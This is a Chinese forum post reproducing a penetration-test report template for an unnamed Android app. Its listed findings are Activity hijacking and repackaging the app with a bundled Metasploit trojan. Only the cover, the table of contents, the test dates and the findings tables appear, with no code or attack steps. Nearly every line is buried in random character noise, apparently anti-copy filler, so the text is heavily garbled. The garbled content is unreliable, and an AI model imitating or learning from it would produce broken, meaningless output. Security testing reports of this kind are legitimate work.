找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4373|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
- a r/ Q1 d6 b2 s: P& ~1 K: N7 |' Q; k9 K

0 O- P4 S- l5 m9 r4 k' i- f0 |3 P* L( l8 x' i. r5 g2 k
1 T' D5 M' r; k: d: q' o$ P8 H 4 R3 ?. [! |* I, e2 _+ R

1 L2 j4 }% \& Y3 k& ` : {0 O$ D+ M6 s2 W
8 ]1 H) S$ q; R% \ g$ t. y2 ]$ v8 i) S S; q7 k! N

. T8 Q7 c+ m; W( B: s & J- b' t% a* l7 d8 D7 | 文档编号:                & V; r) A6 h" h, z! D 2 r2 J& d6 J2 n3 T5 {

0 |# Z' P4 Y) [# k: R. [: y# S+ i/ V, X/ ~

, g5 I6 b3 H: w+ | 2 _* d& ]% |* M' @   1 j9 Z, s+ T, f P+ g 8 j% a" L. t7 z0 z* }$ p

# Z) y8 o+ V0 } c! t " c0 s9 ^4 x/ o& Y4 o( t6 k

3 a- N) ]1 A4 x 4 S' ^6 Q6 `8 B# W& Z% P   # W+ C# O0 D4 v; `: B* O$ ? r& p, _) x* N' i4 `6 M! N4 K

) S! h- v4 {! K9 ~ 4 U: S8 P! o$ Z8 q1 O w0 M( G

# Q) t% H; m5 f: U) g " T( Z# z' O3 Y+ s g2 R: N   ! V# i; s: }$ w' ^2 N) U% @/ k 6 h* h0 O5 g8 R3 u/ j( I

$ p% I( [( g2 m' U# | " n, C& U" z3 Z# [+ e# X

7 g N0 O% L8 t) K6 @. a * B' H5 a% N2 m   , H: r/ W5 ?/ X4 ]$ w5 Y : | Z2 E/ r7 ?$ F; t

$ P, g/ i' Q& e/ K/ r8 \ ; o$ }3 o! M, V* ~

0 N. p3 F7 T1 a- W- x, L/ l+ D ( h+ w1 ?: r1 V4 ?   8 b# \6 B, Z, v 8 e6 p& \# c( L

% ]! j4 e# e J( J1 u0 i" i1 h% ?; ?" ?9 u+ o

# U: V [0 j9 e; p+ X/ s$ R 0 N- g4 y0 T! i$ Q+ n" Y 某某某APP渗透测试 $ ?! T' O7 M+ R" f7 j4 J8 k2 ^! t3 F1 a9 o" \

1 _2 m( P' @ v) O% U2 ` , V" e" ^! V3 N; h6 u! g

4 l6 I( e; n# z7 m 3 L0 _2 H# @- {6 q, q* p) {   6 f3 [- y* P& @ % Y8 H1 k4 l. {) }

* E0 x$ ]. f4 J7 T* A$ e. m. B* A% S, I+ X" }% Z, g- m

* ?# f! \. }/ G* ? ) v$ \2 O" z" ~' Z. z   : Y+ `& R% U' B# H H+ a7 X - H2 y3 L. L, B

5 f4 Q. |" D% J( B; p9 k: Y+ Z & }9 @; r7 o6 B3 N

! d1 P' g5 V+ b* S) \, A " e) \6 k4 `" ^. T, u   0 p& y! l3 l* b5 a " A6 W% a! @5 t D% n! G, T+ J+ w2 @

& j `& n+ n3 B; l. P 6 z& w% r: l" h C- }' _4 P

. C [6 u* X" p8 L1 m: s, Z" X: g 5 |: b( e. `: x6 ~. K   8 B: @* b* f9 M6 g 4 a* W# d& q- [* K/ ~

, ~) u$ |1 N# l* \3 H , o1 H, @$ ?6 s& w* t# y

( R1 ?! j1 ~2 B. m( W" S% M0 k 2 h& |8 x" L: Z0 \# ?$ c$ a 技 术 报 告 ! K; S% v3 Y' {0 l " |0 {7 f: r" ^7 E: z/ i& }- I* a3 V

& a6 x! \9 ]" ]& {2 O) @- j" ~4 K- T : a" m8 J( Z/ e) ?9 B7 {7 s2 ?6 r6 _

0 v' }# \6 c( ~+ N" q# ]8 @+ X* L) p$ U, Y* w   ) |/ E' O6 }; m& `2 y: {# t 7 D5 ]/ {1 n+ H

* J& h- E/ ]: G, _8 Y8 M ; D5 G) [! k! p3 @

2 A9 @4 S2 I! X; h' w% w2 N* D9 Y% ]8 W& @" I! D5 f- ^   3 D. R4 }' f- E" C9 F' m$ ? % q# I' m/ m. |4 w

7 m4 ^% ?8 v) [6 M( a+ p - `! E, b# m, [0 \4 i, U3 @/ P

4 `: \, s1 }( b2 g ; d3 V# c# J% Z/ \! h) Q   . c Q! y" `8 K A 4 S) R" `1 @" w5 d2 p; N

7 `- e6 A8 ~0 _3 M/ d' N & e3 U) N8 S8 N& N- R

- \( m* D W; L5 d0 B 2 U2 b$ F8 E6 T; z+ j   1 i# R% \; Y% E* ~ : r% E& D- o0 s& s6 t& m

3 Z$ W4 ~) i1 d; `) @6 [7 t! _ 1 A4 }4 o, A1 j1 ^& T& r: O/ S

: ?; t" M7 ]5 m* t1 y & K+ K$ u t% ~2 C* t* P. O: \; O   & Z% U; ~! A$ k7 c- w9 R0 A! \4 X ( A6 n8 D5 Q' I2 J9 Q" j

7 g# Y: n% p( I' } , M5 W# v" c. i3 a4 X

1 d6 G# \6 ^' K2 G/ C. v6 E " z9 y2 J3 E* Z8 `6 f& i9 s) Z; v   1 B1 l% W$ X6 u( R# R# y) @* Z# G ! e% n* I, U3 X; S( E4 [

. x6 {( C. ^' b- G- p5 _- z 3 ~4 J( m8 q$ ]1 I5 o

! a/ @7 r# x5 a" L/ i, p8 d: O6 h* r7 ]" Y3 e   3 m7 b- [1 | ?& f % b0 I6 O! v, n' C1 p

! q8 f0 Y! u# E 5 e# ]+ @, i L% u

! j2 T# C1 v5 i' a: b% H 3 |3 Z7 ?) _1 x9 @ G" i7 K# u& v   * T1 N* p# i$ E+ ?9 F* g 2 @- v; {+ q; O( f+ J

# t8 M% Y9 [1 J: W# K3 Y, T5 w, v$ ?7 p- |1 m' p

6 p9 B2 t! T0 |7 k * Z2 K0 c/ B5 `' F1 T- q' e0 i8 l0 `   U1 D; T- a5 B+ F2 [ * L; @; Y$ O$ ?2 j3 y, [, F

/ m/ k- `& F( ?& C G) l& \! a; U- j( u( [

. J% N* B4 X9 G) k0 M' O2 j8 K5 @' x5 K   3 l2 n) Z) {: ?0 v0 l& ` " K# J ?. G. D( R% F% E" B

& c, I) i/ {1 u& S# l7 T1 V" r 9 k) a6 D9 t' N; P5 y

% i8 T% C1 u) D4 `: P0 ^0 u $ u+ i1 W3 s! T& \- o3 F$ w   ! t p$ Z$ `( T5 n1 F & \8 y$ }1 E* h! P+ o

8 p2 f7 k7 N0 C, l ! a5 q7 l S2 b$ G e

9 {5 t/ G! L7 p% z ) n3 Z5 f" G" [; c, h   4 _" W; E1 h' o. r . u9 u2 M8 q9 g) A, }, f& C

* f2 c2 x' V" c+ {: Z% r K ) e6 p1 O; K# X! a$ D+ k; f4 o1 Z2 M1 _

& l& i1 F3 Y6 N( o+ X; |6 \- D! ], _5 P, s7 w) S& W1 V) Y6 q   c9 | @ N5 J7 P- M: j! \# h3 I 3 ]2 R: ~4 g& [* w1 m* r- c+ @

) W! r6 ~) G4 B 4 C$ `/ q" Q q" ?& F9 ]0 E' S! s0 Q6 N

: y+ @9 h' l2 J( ]/ w 1 Q1 Q# {/ C# @2 h   & v- u1 ?! ^) i0 t0 D! V& f: Q( M, D3 V4 x. X: E

' V4 O# W/ X9 j 7 x c* A- g. B! _2 S! L

# r& L& X2 H) d' H & Y1 v( x1 {+ `2 x0 A5 I; ~6 v   # a# Z1 ]; M$ a, I l1 ? 8 o! [3 d, C# }/ w. h$ \' g3 g6 ^

; N3 i4 L- a9 \7 y* k1 U% t) a9 H1 C 9 p+ s2 D4 \7 [( [& @1 n* F

! l/ @, N; F2 I 3 r+ v+ X6 S( Y/ X   6 o: E) Q/ [& Q. n ! t' V. Z5 ?/ ?" Q3 m; ~1 V1 v

4 d8 o; E7 N8 }+ g/ J0 p) Q J& K, X: M% A9 t

& ]1 t7 o, i6 o, p, A( Z" W! G0 N# q* T3 f# G; I' r   , y& W0 x1 I) z1 f 0 ~' B( a3 }; V7 q& W) K; {

+ R* i, [' |, g: M : O9 K, K0 P0 q" c0 S. l

3 ]$ X2 a% H* i3 W4 f6 ~, A! Y. h+ Z0 f4 b3 S4 I   $ r# [0 K( v, e: @ 7 t7 u* {- `5 \: R! a

' O& c7 b+ i& Q- }0 O% \2 G+ {* G& y( y5 b" w2 y( I0 _

. u6 V4 E m. s- z9 h7 `5 l " B4 u0 A; Y4 w2 \! J8 d3 R3 G 二〇二〇年 7 Q: y( u7 r$ t/ E% P* ?7 B , p9 d( Z- ^+ ?+ o8 E

+ h2 J7 }. _4 D7 a' i+ {* _- x8 w2 K/ c0 j( f+ H' r C& n, x4 ?4 a
1 O/ @ H+ ]9 i : e- C; @( f2 u. W+ M
; T% \* I" G' S0 Y/ x3 n4 O5 s4 a! F+ @- F0 Y( Q. ^
$ t) x6 v" B0 O* p% C9 i6 W+ o 8 G+ s. ^4 w0 {1 O# \
- S9 M. M, l1 E* K# C * d$ a/ p" g+ m S- |- Z' q
$ G1 C9 |2 t6 J/ { # `* Q, R7 C7 h- b/ G) w, z
, t, G+ v( W! M4 ^ . v3 n- {5 H( s$ e' N) i, O7 e! ^
& a% W8 h+ X ?. j3 }! M# t* m S* v" d. V; f; M9 Q
1 v3 r) \/ D3 Q$ m) N' A ! c# n9 e$ z3 s

: X2 @5 W9 `, _9 P* r8 b6 Z$ w% p " [) s0 A6 \+ `% ?0 g0 f 目 录 ' [+ ]8 H4 g# ?8 m' U* D + ?1 o" V; x3 y8 C3 ^: S9 j& A6 W9 l

+ D1 Z) K) T% T2 h: M , x2 ?( h" l4 C$ H( Z/ T # m0 G5 L6 h, s! ~. _# k ; N/ x4 `2 s1 J$ ^- U

' a: v M0 R/ Z( k$ R # M- ] b5 K7 e! {+ ]   : C% @9 X8 @8 x2 V8 c/ @) v' }7 l, h9 K# b: C* a4 h# L. J7 |7 m

# o1 e- W! l" D- w1 h w# ^5 a$ r ; Z! H$ d, T6 I B5 U

6 S- z( U/ h7 {" @& d. G% C- v+ c) V& L 1 概述... 3 h5 l& U- E X% H6 z 5 y: W& n% ?- v; U

: U) V; s# f B9 m. \$ F 2 `6 I: p- V- T( G1 n j

; b; O3 @6 Y+ A- S3 Z; M2 i6 [# B " ?$ P H" Z8 Z 1.2测试时间... 3 ( O0 F% K/ e" ^* L+ L: t ( h5 U W! n7 {, Q- x

, A- L. e& z! x$ l$ B" K O% ^ + a S2 y" M7 l: z, G1 _9 V% P

. W2 m; z' u9 H5 h0 o' i' b8 k 5 c5 s# W& B2 {! O: H0 Q- m 1.3测试对象... 3 + e6 a0 u* a3 _( c6 | X, o& V4 o& \

5 [# m- \( Q1 Z2 p3 x: Y ! D! S" \4 H$ U$ P U/ f2 w

* }" ?& r: u. X; e 6 r$ | D. [) a# B' j 1.4测试结果... 3 5 ]) U# r' u9 y* {$ l6 f( Y+ D" Y

7 Z! V& V8 q0 n/ i! R: [8 p1 [4 ~ v& ^$ K2 ~& y

* `0 y$ d2 W7 c % _: x; x0 |2 L( `) _/ V" d# ~1 B 2 检测结果... 4 ! u$ T H+ c& O* F8 X, E & Q% |4 Q& ^" _( R

& l1 U7 I: Z. O# e & [' j& G" h4 v. p( J2 s5 l

: i3 Y7 y" e- Z9 \. b& B4 B2 w2 ~4 H8 Z! _+ K5 M7 r; s 2.1 某某某... 4 . d4 h% x! e/ I0 m: i. K$ z2 I

% l$ ~! v5 O2 ~5 C3 G ; J9 c: ~' F% T; f) T! l: f* p6 [

# `; y% l( e: P * }4 y* M' ^7 ~& y+ p; L: R! k! b 2.1.1检测目标... 4 ; K: C$ e x3 X8 ~3 Z# ]: f: A# }* b# }. i

, s, o, u2 Z) b+ m* e# y/ ? + m$ [8 b0 Y* C1 F: e' q$ P

7 k! ]/ R6 V, ^/ O: a( P 3 V' d/ P' ?) C* k 2.1.2检测结果... 4 3 T* \1 O' L/ P9 H( n- A' z1 n) i% ]4 O- p8 h( K

: O( [9 \8 O9 f v " d: X; ~/ B0 c$ D. i0 c

6 R, A/ O8 R' r- c) _ ; t- G! T9 P4 q0 p6 ?7 e! _" L. _ 2.1.2.1. 4 # H$ x6 ~6 m& g6 O. g1 f ; ?! |9 @$ \4 M/ w# v" m7 L) ~+ V

" w/ l8 r% W, E) [. C 1 H0 g0 t6 Z1 ]* k, l& R2 M

' O- q6 N7 W. {7 n" N3 `- W3 g, I 0 y f& \' ~( V 2.1.2.2. 6 8 j) ]. ^; P5 M; n$ g% K: Q5 n [3 i. _

- A- ]# ?( H1 }6 t6 I # Y* @% T% n; T& f) D. V

: g9 B5 z9 s; M3 p& ] ' _# n" C. L- ] u - ~ M% P' Y6 d9 f6 ~4 B* c! `# }# E5 G' ?+ Q6 d- {5 J2 D0 o

, b2 S" L. Z" m, b# b5 q9 h, g$ f 6 G9 L# e6 A9 g' _$ R0 |
0 H3 T& r# _! _* ^$ \ 1 |! X& Y0 s7 L% w
) G0 {6 Y8 S: z" }% q% d 1 L! x* I% r+ P; |7 [) _( E. S- i& v
4 k1 R. D/ l/ N0 L& ` . f3 m. T: H( v6 B
& i4 Z3 m P8 v( m( j 8 |/ c$ t1 }7 T

% X) p4 P+ M" y, n9 } O% e" G0 B/ c8 V( b' K 1 概述 3 H: B7 B. n) P* B6 I- c# ]- v3 b: v/ ]- d5 f: {* |

1 R! ^: C0 g( ?# n) t8 P% V# i \6 X

, a# e+ v, M* x7 Z( h. w) H0 W, L: J- j# ]3 }' ]) w+ j; g 1.2测试时间 7 s7 y- d; A$ R9 u 0 F' T- a0 E7 `8 B

7 J7 w& `: d( v9 J0 d F! r, g( U9 R: X% [# c% V# B2 _+ M; s ; B+ X; u4 `4 \4 {7 L6 r) m6 z# a7 u6 q- d( Z) l8 K! S; k4 ?# n; }* \3 O9 W; @5 j. @" ?0 h0 j: q2 A J! a: p( [' ^2 U. c( o& `5 M: R8 g5 |8 l6 u) L1 N. {' w* j" J1 d6 ^, l- A4 R( x0 L$ {2 j% m, {* z0 Y+ v2 m: z& V% U/ s: @- o9 J% A5 k; k5 G8 `4 ^, l; \- ^ {# d, N5 T7 f* q* F* I4 s( k, v- s5 K/ C/ O/ |2 P3 H6 q Q, h* d- L% U7 Z! B9 @6 K g4 ?8 M# g7 L+ H- p7 F! t+ ~* g. P* f) Z& E0 L& q5 v) z. t$ v7 q7 }: N* I6 k( \; i7 ?) S; D! Y$ d) E: g2 X! C' m$ i# c" o5 W! r$ L6 y8 W$ I7 D I9 Q9 L+ ?( H c7 f8 Z* \" o' z! r5 F& u3 A/ j8 k) g2 x. b' U0 \0 P' |6 ^8 R! r. g& R! j1 U% [/ T; E! L5 o4 S+ u! O) ?7 s* b$ ^! `; @- ?/ W- E. z! O6 E4 @" u& U& x4 ^
! Z% Z( P3 | O/ J , y1 U9 J# K5 d" l

' A% L1 l$ X8 s3 n7 d$ b$ e9 r5 w' b7 w: W+ q' k 渗透测试时间 % g) X& ~0 }; J' W$ d8 L* h ! p7 T* c' J4 w! p4 ]- h6 m

4 I) T5 ?: t/ F , u" O: y, P& V9 ^
) T. v8 M: H4 h$ w n 2 [5 i3 {3 T7 X6 ~2 Z1 v; ~- \0 |

6 q8 f0 o+ ]$ Q! N# O9 a* e4 s 4 \8 G) a Z3 }) ^ 起始时间 / O' J9 x! R7 o0 B9 s C/ [7 u* P. R

- s# p) m& A1 @& \5 H# Y ! K; [8 G v+ d. o7 y5 a3 d
1 @/ g, M) Y% s. M6 S4 A- P k1 M8 n8 j; L/ A

0 G/ j, Q: z7 z! y0 l, I% H) `5 ~8 y {; n 202046 & n. _8 v( d' H' m# {1 L ; [! q# h- f$ R& b8 D: H' M+ E6 ~

. ^2 M/ G6 F5 j2 N/ R 3 K" m4 _5 c2 W' w G. O# h3 [) L5 [
5 F, e1 g& [/ Q( P8 W / Y8 D m& m1 F& O% V0 k- q

/ s1 p8 h; h2 W7 \ . U3 g3 r+ ~% h/ ]% {) n 结束时间 ( b' n3 g3 q0 G+ x: P9 O5 p / H1 N( p5 v: H& j$ k3 L5 T

7 B. |2 w5 ^8 ^9 A; d5 s" c- U 4 r( g ]5 F9 H; ~* }6 L+ |: Q
( G M1 o L% h: \* y 2 w+ p: u Z/ A- S. `# u! T

8 ~$ a6 w$ @, F) s: g/ l# s m* `, R9 i$ A( D 202049 / S0 F2 [# r& k6 k% A - `$ C0 A0 }8 B! c! Q/ ~0 m

5 S4 i7 |# A0 ` " ~! N0 }* Y( l3 K; p- a3 U- x
6 \* Y3 E# K3 E, P! h+ I. y/ t ' i2 g# z- t1 C9 \( o( m( b

- u. o: Z: Y& f4 }9 P ; f8 v Q+ _3 E. o7 o' I 1.3测试对象 # B6 n0 q5 d7 l" Q* x( l+ s# P3 X ?, E

+ P6 d3 _, j, v) I; e9 z& G+ k: B" r( h. b4 s# {9 c

# W2 ^, C4 T/ M: L0 {+ C : q* v7 G$ L: d+ l0 x 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: : ~* u0 f! Q) Y) ]) z , i) T9 Q( L9 E6 e

7 H( H7 f/ w6 e2 K2 ]& E4 Z+ }- d) g: W4 K- r

& E7 |+ N6 B3 W' o+ i- V& a# D : S! L' ~, x1 n: m 1-1 检测对象 % A4 n4 @& g5 @- d1 ]; H8 Z% W - W/ j( T X' y* O+ @* B

+ ^: _% i8 m5 R8 k; g . V, U" R1 F: p ~0 z* U 2 P( Y0 b: n5 H7 M5 J2 A! Y* a4 k6 D4 H9 R4 K" i: U6 C- p/ ?2 [! {! q; a: F R! b) Y/ k- X9 f4 ~" O% O" ^4 q; u9 ]9 e/ z( _0 k5 d6 _, K W3 _; Z/ f1 C5 W" D( w9 t1 J* A% @7 D, Z3 [9 ]$ S! |. ?: o8 @; R% }6 n0 I. f" L' o2 A, `7 x T. L7 s- J9 O, s9 V; E$ `5 }7 R. ^1 E1 p" E7 e) b/ q8 T, |) B1 O' M4 ]$ f% g2 I5 S) U/ p+ s3 K' i! ~6 R4 G# M$ j" M4 `" ~) \6 I6 n/ G3 C' W u+ p- x! x3 L- ?3 ~! j1 u% y6 P% N* `9 s+ b$ {& [) K, }8 ^/ k' Y! {/ I% |& @# w+ I8 u! y! D4 X) }+ \2 T6 `: n( r D: a6 }+ i' [$ c4 t, q1 D% g. F) c9 \' p9 R0 F& a5 ^: [# |6 ?5 u) M! \9 ]$ D) B+ J- f2 h) @0 D k- h! S( z4 r; z9 {+ @7 P! \1 a# e) V+ @2 [& M2 O6 K) T. r+ w! X* w& B. D" t1 L/ U# \5 _, y( H x& E: k# X# o2 t; I7 C- y6 v2 |+ B% k( g! c4 I. o! r$ x4 C" [, ^1 |2 s7 a) Q% Y( k# Y
% _2 o" L/ {. |, ?, i) |' F/ R: d$ c8 Y/ H: a

" b' k; Z1 U3 A7 p: H; Y! ~ 0 }. E& \8 r. }% M% G1 q 序号 J. f9 R* |- q$ f) T" Q, u4 |3 ]+ A3 p- d

' a! f" K! j. s . R1 p3 E3 z! K8 r3 Q4 x
l3 y! P- I" M ! Y0 ?; ~& a% W( l7 {. {3 \

5 u% |" X5 U) S3 u1 R7 c- R4 J6 l9 w , c! X0 `- i& ~9 y F6 [ y 测试对象 ) [1 }! H3 p( G8 s( l% v$ x( z+ e . E0 W% Q+ C$ p) T8 F6 N- Z

! b3 P; y. g+ M7 S8 T8 N 2 T! e/ M" t+ {8 q! n% z0 X) h
$ U1 M2 L2 ^# u+ O ' _" Z h3 f, w: l( U: G: T

# k. F8 b- X2 w8 K% o; i 1 f2 x- y8 B& [# k0 y: ^ 测试地址 6 R0 ~2 O9 k: k. C v% B. Y ! r+ |8 y& p% }

0 K- l/ `* z! d ' r1 w" }# L0 c3 w! A1 g) ^
: W' T4 y" F" R. U! N 9 V, G* F5 e6 ~8 m

* Q; P% }6 j6 w# O. G0 H ' T3 F' X, j- @) \% X0 a 安全漏洞 . S0 T b* F& y0 V) ^) k% H$ } ' h) P8 G) V+ a& C* v& k w

: W8 m; G7 A- n & D! f b9 W5 l! ^, u3 y8 ?
( S/ ?0 R N. g7 x/ ~9 z. n( x; c" ]; s) @7 |4 N# G. A

% a, _! `8 d3 H' A; q 4 z3 ?7 o8 r6 _ ^4 s& R" V' a, i* w 1 , I; P3 A; E, {2 O + k6 \3 v$ @( K5 P0 r1 P, U; |5 f

1 y5 k" o% O( s$ p: L' K8 M9 _% E2 k% D y
1 i" e' W. A9 v( \5 h3 F + w* n- ~# x; u. ?

. y$ L0 t/ u+ [7 g5 { ( X9 m- ^! k3 p9 `) z7 y0 ~* z 某某某安卓APP 7 l9 m1 @. Q% ?! m- s T2 n. b, ^) m- H7 e8 g- u. R+ R

, ]7 f4 W {. t) ]; |) ] 3 ~. b, `# f0 y. @5 b5 m
* t! _8 h/ Z! k0 Y 0 x8 V2 y1 @; D6 ^( [' U8 u$ ]. S- M

& O( J; g) K% B; A2 w # s7 S+ Z) z d/ B' y/ K   . F% _2 D% [9 w# q( W) y$ Z 4 e, B% X* f+ E1 Z" _ n- _

) \/ ]/ j3 o3 K3 C \* `1 R' R }) t" ?0 ?4 j/ w8 z N, P
6 U& P! M9 L' a 2 n3 p/ A5 S# F" y$ q3 w

! @6 E Z5 v$ A6 i 9 H! v' u# k) l& | 2 ; I% o4 U3 a3 d% d/ \+ W & ?. ~: u: D' |9 A# j' ~1 z% K

2 i6 C! F0 I4 d2 o 6 d% h) @/ k$ P7 g' F
7 D! l6 x& k/ @# @/ a: _7 b7 y; W1 M7 O7 T: I& O; k+ L

8 f# p# K! o- [# G " M) C/ |' W/ m7 e! u8 R' ? 1.4测试结果 5 f U# i0 K: I. p; L3 q8 z+ C, j+ [& S

% P) P* b" }6 m W. i1 R, z C( E. S$ v

& j1 r. ^ s0 m, e7 `3 E) ?6 X& Y& N; x/ Y1 Y5 m! ]1 Q% B 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: - f5 D: U9 ?* f9 [0 s # r3 Q/ g- i; L2 H; ~2 _

+ a. B+ B' U( v' P ^ ( ~6 m6 a( K/ h. C* f

# Z6 D, B6 X. v1 Q8 K! D7 A4 M " K: Z _6 b# T* e1 e6 @9 S   5 d. o% G4 o+ R ; H4 O- m- t; M, b5 S) ?

& f0 f F' M, L6 F w& u [# \6 d7 `0 U$ Y1 x$ _" j
* e) q- M/ V, b# t 8 h* Q$ R2 C ]$ @! O8 w # I7 Q* N u# |- C; j+ `# v. c6 k; Q+ K# W% [5 \' \. X6 {1 z( w, [0 s" d( l2 u0 n6 T. L6 B9 [% |6 J: N/ v! N' U& O/ z* V3 R+ H' O6 i7 {, c p: Z* h# k$ y" W- s+ z4 r3 Z' X v" \, P& h5 I& s+ P+ z- V O( b5 [# G9 d( L( ^, A; g6 r8 f8 A( w8 v9 R' w/ c1 q: z, N- _ {7 G0 E/ s1 F! O0 m* X) y& P) [+ @. c- M1 i% K7 K; }/ A/ \- h2 e0 `3 m5 B: u3 b! f$ i) Q. g: w! U# H$ U$ W& ]0 t/ Q8 x6 }4 p+ S( ~9 l4 M9 `6 _# V4 H1 F1 d0 F( D) a1 }. V3 p! J. v3 u, g- k, m* a; o) l: l" ~2 j/ z/ `- x" Y' s- f J X D0 k+ f; z# g+ |, b% \. G! H0 F$ T9 y# u8 w/ ?) o3 W9 i9 X2 U7 `& h5 ^" z9 s2 t" D4 Q0 ~( }% p" P; M+ L6 {- f' M4 p' x1 Z8 e, w& L0 `& F) F+ \1 D; w2 R, \) U& w; Z& ^, l- }. w* }7 M$ ^0 t+ ~* f$ w/ t# F# `' j. B z6 Q. ?& \7 t4 k; l8 o, J1 ~% _/ |, q1 j& U. G% e# C; U- N7 n* y# ^9 D1 Z+ V$ s, L& W! S6 }3 v6 a: m' T& o9 ~+ D; R! q8 C6 z2 p8 k7 X2 k5 `8 ]" M1 u4 j6 [6 y" D2 @0 W4 R8 J% s9 c7 L+ e5 C9 e1 J4 r( H; K( s( i0 {: B' Y3 G( q {0 n5 g( q0 U" J6 }) P$ H7 _8 y+ q" @" [/ Q# A3 [7 G( h& Y2 x _* D, i/ G7 x# T9 `/ V2 ?( A1 V/ _$ x1 ]% F6 L0 }' N# O
& D' \7 X% t% |' a1 F5 V: A3 n) c4 K; l9 m$ z2 M

( _5 Q' T6 B1 E # Z/ ^9 ^: c; a7 i+ d& d7 v 序号 & ^: z7 M4 V* k9 z7 B) O9 A- }& }

" t/ ~0 m1 H& u1 w( f) G0 U, ?# p# P2 A& t4 K* P9 x! k: N
7 }- O6 h! h# U6 C& F + a1 M9 c; [ q9 b6 H! B

4 S5 E. r/ z9 S' g( F% `2 D3 W: ? 8 o+ J. L# \% N$ D 系统名称 4 o$ I! j. h, @" R7 w `, k ) G! V$ q; b# O+ n# x3 g8 q% Q

- ?1 B" b7 O# i1 d% A 4 v; s r: ^- D
! d0 K: |( w D2 L 1 K0 e+ q% X9 R. H0 d( I$ p1 M

% ]/ J' K; S5 E: c $ J; |" c ^' @8 E. v. i 漏洞名称 * b' j$ G/ d" \: I" D: q & v' i$ ~2 e2 r# z3 S7 D5 M& p

: D& Y8 r7 R1 q! B5 C$ P/ j2 s% Z - B' ]6 i% F3 R. L7 w1 _; j
# a; B( _1 O/ S 6 ]* l/ c/ |! Y' G4 } b9 [3 ~

% z( L' ~0 G( H- w. Z% k; e 4 A" E1 N' ?# q O% Z 漏洞危害 $ Y _ B. l! C( Q0 W# _8 z! P G7 A* w+ v3 @

& V9 `# ^7 Q \% A# @% y / Y$ K8 a1 P* |7 x P
" ^7 a6 p' k4 u% g+ M5 v7 Y' |$ P. m: r6 \

5 A5 l" x1 @2 J6 ?1 i8 U8 U; F : [ _' Y3 _ L, M0 x 修复结果 9 v3 u. ^! y2 n) q& g ^ - s ?* q, Y; _

' D* Z: j5 j5 N, G" r: A$ k3 _ : V' l0 v1 A# o$ X7 x
3 R8 I4 ]" r; \ - ]% G( q7 Q+ f: b

+ \/ w6 y# e, @* z; i7 ]4 k ) \0 t: T/ `5 T. k) B9 o. ?. z* Q 1 , e+ }! C1 g4 s% j" s / p4 z9 K. U5 i0 U" e$ S

, p; X$ T0 B& o . ? W3 {* M Z; p
! t. k' i6 b- B" h 0 J, x2 H9 I) i4 K: C0 e7 E& u" x

3 A: @; ?& \& A5 ]9 w: c; }% v. x @8 a" o$ h 某某某某某某APP 2 X6 b+ }3 z: n' g8 `5 @5 {% N# p' W2 H" Z' J$ |+ F

7 c( A" l3 {6 d8 P0 A + g& ]) _, H6 {2 f" S: [& z: M# @( ^" C
0 g9 O& k/ k6 I j# _( e / {. T$ M. T- j2 j/ E/ `

0 n) |# D# l" d% @6 ` : i E( W0 q% e Activity 劫持 _3 Z, j) `1 \1 C( P7 h8 f ! L3 y4 S' H5 f8 F/ L3 w

' l' v" C' \/ r+ T6 s0 V 6 p+ j, T" V% O7 j

/ R: W1 F: O' X2 w1 ? 0 l( o U$ s7 O4 S   + G! D5 G# }& H2 ~4 W. R8 \ 3 Y# L1 ~) D8 V, k. ^

) N8 c; \5 y0 Y' K# } ' \- m- p- N4 Z" B# R
/ ]( [, A5 l. ~" @7 b5 t. H & Q; u2 P0 e$ D8 d# T

& a7 _1 K( E1 w; |2 O * b+ N% m! A& L- ~+ S _3 \9 l4 S " F/ T2 v5 P4 _' v! d) Q 3 Y q+ z6 L6 z& X$ e! `

; Y) f3 ?( O4 I# j4 D, x \+ j/ K1 R% A K; Q5 t' \) L; S/ y& Q
5 y9 V9 s+ [7 @9 @% k0 A 0 z" L, z1 \* K9 A

0 F4 w2 y- B+ j# p( @- V3 [# e7 j" J" ]   8 ]0 S" J( c, g- J7 Q5 [ 9 Y3 l" K) c' }4 N0 ~; T

) S, r$ D3 C' _8 Y5 {+ h9 [+ O. k8 v, X
& E& }! b5 K S9 ^ : ^( A r5 u! C4 c* d

9 G5 x8 P/ v% C4 `( G* `& `5 R" ~/ W( H& z2 e7 O, H4 t/ A 2 $ P& J4 O+ }+ e , R0 N4 Z) H/ i9 z: L! e, N

2 Y, f" l( K8 L# x 3 U2 {. F& k1 @; L2 n+ H, R4 o
+ L1 q% H3 a9 ]# F; ]. J; a * p" v) c& y" d N

& B- N4 J; |% s! { I0 [' H/ o/ N/ X, w$ l/ e+ e ? 某某某某某某APP ) z8 ^ {9 v; V. @ : L4 N$ G! c5 H2 r3 x, y

+ f7 z4 _" K5 q# X4 @ 4 W5 U( ^# K6 p# e$ j( Z$ @: i
/ i. m0 l% V# I- a$ {8 s9 J - _ x* V9 I: O+ [' U# I

2 A0 E/ T2 V+ L8 D ! r( \2 q2 J: e0 Q 反编译二次打包捆绑木马、篡改APP代码 : c& X2 u0 c4 t0 t" Z7 ^! N! m4 L 4 i( \, H5 e9 f. T$ V3 m; s

- ?5 Y3 v. A; U( \: ?: J3 e7 t ) o9 S0 F5 U! j- J* j
! r3 n+ R& x7 Q/ r+ s- w' ~4 s; o* ^5 |& Q N

0 }" N4 {8 z X% z/ `0 [9 F' `. |+ w# h* M! [2 | * |: S/ E3 O" {. d! { # u8 _& S) @9 E& s2 q6 i

- I- Y: I3 A: K! t 0 T' U3 Z! ]% k2 o
6 a/ f* \: `5 e8 p1 F; V% o' X+ e( B- V9 R; p# C

6 x1 ?6 Y* C. c: {& ]' r8 n, o % U9 n8 O" _* V& u+ r4 G. }   9 `/ Y; {& @3 H* G" b' a, I# T8 U1 J r. W, j* H5 U' \4 ]* W

& w- }! Q: X5 C: I , X% N5 {7 ^3 ?9 k: ~# j
9 R9 p; I3 ^4 g& x" X% O4 N# M! ~) \% w. `* _6 t
8 e- g4 z# V4 d4 G+ ~! x6 f9 } Q4 R

# V! g9 e3 X$ d6 ^0 ?5 u) u( g# Y 4 a1 p, B' q3 E! w, o+ V   6 V1 T* G& A* ^/ X 0 h0 Z) s& H( L6 |/ S" ^

